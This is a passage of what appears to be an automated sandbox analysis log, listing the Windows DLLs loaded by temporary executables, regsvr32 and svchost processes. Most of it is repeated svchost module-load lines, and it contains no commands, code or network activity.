                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cmlua.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: cmutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\93B.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: propsys.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: edputil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: urlmon.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: iertutil.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: srvcli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: netutils.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: appresolver.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: slc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: sppc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: pcacli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-SUAE2.tmp\1EB9.tmpSection loaded: sfc_os.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\1EB9.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: version.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: textinputframework.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: coreuicomponents.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: ntmarta.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: coremessaging.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: wintypes.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: shfolder.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: rstrtmgr.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: ncrypt.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: ntasn1.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: msacm32.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: winmmbase.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: textshaping.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: explorerframe.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: sfc.dll
                Source: C:\Users\user\AppData\Local\Temp\is-5EQGI.tmp\1EB9.tmpSection loaded: sfc_os.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
